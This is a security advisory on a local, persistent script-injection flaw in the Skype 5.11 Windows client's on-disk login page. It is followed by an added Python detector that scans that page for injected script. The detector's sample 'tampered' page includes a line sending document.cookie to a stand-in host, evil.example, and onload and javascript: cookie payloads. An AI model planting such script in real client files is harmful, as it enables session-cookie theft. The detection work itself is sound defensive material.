Document Title:
===============
Microsoft Skype 5.11.0.102 - Login Page API Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=596

MSRC ID: 13166

Release Date:
=============
2012-05-23

Vulnerability Laboratory ID (VL-ID):
====================================
596

Common Vulnerability Scoring System:
====================================
2.2

Product & Service Introduction:
===============================
Skype is a software application that allows users to make voice and video calls and chats over the Internet. Calls to other users within the Skype service are free, while calls to both traditional landline telephones and mobile phones can be made for a fee using a debit-based user account system. Skype has also become popular for its additional features, which include instant messaging, file transfer, and videoconferencing. Skype has 663 million registered users as of 2010. The network is operated by Skype Limited, which has its headquarters in Luxembourg. Most of the development team and 44% of the overall employees of Skype are situated in the offices of Tallinn and Tartu, Estonia.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Researcher Team discovered a persistent software vulnerability in Microsoft's Skype v5.11.0.102 (Windows).

Discovery Status:
=================
Published

Affected Product(s):
====================
Microsoft Corp.
Product: Skype - Software Client 5.11.0.102

Exploitation Technique:
=======================
Local

Severity Level:
===============
Low

Technical Details & Description:
================================
A persistent input validation vulnerability is located in the login web page that the official Skype VoIP software v5.11.0.102 (Windows) loads from the local disk.
The vulnerability allows local attackers to modify the `index.html` file of the login app stored under `C:/ProgramData/Skype/Apps/login`, which results in the persistent execution of script code inside the Skype software API context. The page is rendered by the Skype client itself, so script placed in the file (the advisory uses a javascript onload handler inserted directly into a link in the page text) runs every time the login page is loaded, with the privileges of the Skype application context rather than those of an ordinary web page.

The attack scenario is a local one: an attacker who can write to the file can execute script code in the client or read the cookies of a saved password session (the "save password" option) in order to manipulate, infiltrate or observe the VoIP communication of the user. Successful exploitation results in manipulation of the Skype software context through its API and in cookie stealing on the local system when a session and password are saved in the client and have not expired.

Exploitation requires local system access or a privileged system account that can modify `index.html` in the `/login` application folder. This is why the severity is rated low: whoever can already write to that file has a foothold on the machine. The practical check on a deployed client is therefore the access control list of that file and directory (for example with `icacls`): if any non-administrative account can modify `index.html`, a low-privileged local user or a piece of malware running as that user can plant a payload that persists across Skype restarts and survives in a location outside the protected Program Files install directory.

Vulnerable Module(s):
[+] Microsoft Skype

Vulnerable Module(s):
[+] Login (App)

Vulnerable Parameter(s):
[+] skypeAccount - highlight & useExistingLiveid

Proof of Concept (PoC):
=======================
The local input validation vulnerability can be exploited by local attackers with privileged system access or a system account. For demonstration or reproduce ...

Review: skypeAccount - highlight & useExistingLiveid
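The advisory gives no detection guidance, so the following is an added example (not part of the Vulnerability-Lab advisory and not Skype code) of how a defender would check a locally stored login page such as Skype's `C:/ProgramData/Skype/Apps/login/index.html` for the kind of persistent injection described above. It compares the file against a recorded known-good SHA-256 and then parses the markup for the two things an attacker with write access would add: inline event handlers (`onload`, `onclick`, ...) or `javascript:` links, and `<script>` elements that are not the page's own expected scripts. The two HTML documents below are constructed for the demo; the real Skype file's contents and the exact PoC payload are not given in the advisory, so the markup, the `login.js` script name and the form field names used here are assumptions.

```python
"""Added example: baseline-hash plus markup scan of a local login page.

Not from the advisory or from Skype. The HTML below is constructed for the
demo and only stands in for a file like C:/ProgramData/Skype/Apps/login/index.html.
"""
import hashlib
from html.parser import HTMLParser

# Constructed stand-in for a pristine login index.html (assumption, not Skype's real file).
CLEAN_INDEX_HTML = """<html><head><title>Sign in</title>
<script src="login.js"></script></head>
<body><form id="skypeAccount"><input name="highlight"><input name="useExistingLiveid"></form>
</body></html>"""

# Same page after someone with write access to the directory planted an inline
# <script>, a body onload handler and a javascript: link (constructed for the demo).
TAMPERED_INDEX_HTML = """<html><head><title>Sign in</title>
<script src="login.js"></script>
<script>document.location='http://evil.example/?c='+document.cookie</script></head>
<body onload="alert(document.cookie)"><form id="skypeAccount">...</form>
<a href="javascript:void(document.cookie)">Sign in</a></body></html>"""


class InjectionScanner(HTMLParser):
    """Collects inline event handlers, javascript: URLs and unexpected <script> elements."""

    def __init__(self, allowed_scripts):
        super().__init__()
        self.allowed_scripts = set(allowed_scripts)
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # HTMLParser already lowercases tag and attribute names
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f'inline event handler <{tag} {name}="{value}">')
            if name in ("href", "src") and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in <{tag} {name}>")
        if tag == "script":
            src = dict(attrs).get("src")
            if src is None:
                self._in_inline_script = True  # body arrives via handle_data
            elif src not in self.allowed_scripts:
                self.findings.append(f"unexpected external script src={src!r}")

    def handle_data(self, data):
        # HTMLParser treats <script> content as raw text, so the whole body lands here.
        if self._in_inline_script and data.strip():
            self.findings.append("inline <script> body: " + data.strip()[:60])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_login_page(html, baseline_sha256, allowed_scripts=("login.js",)):
    """Return a list of findings; an empty list means the page matches the baseline
    and contains no inline script, event handler or javascript: URL."""
    findings = []
    if sha256_hex(html) != baseline_sha256:
        findings.append("hash mismatch vs. recorded baseline")
    scanner = InjectionScanner(allowed_scripts)
    scanner.feed(html)
    scanner.close()
    findings.extend(scanner.findings)
    return findings


# In practice this digest is recorded from a known-good install and stored elsewhere;
# here it is derived from the constructed clean page so the example runs stand-alone.
BASELINE_SHA256 = sha256_hex(CLEAN_INDEX_HTML)


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_INDEX_HTML), ("tampered", TAMPERED_INDEX_HTML)):
        print(label, scan_login_page(page, BASELINE_SHA256) or "no findings")
```

The hash check alone catches any modification but says nothing about what changed; the markup scan runs even when the baseline is missing and names the injected construct, which is what an incident responder wants when triaging a client that is already suspect. Reading the file with the real path in place of the constructed strings is the only change needed to run it against an installed client.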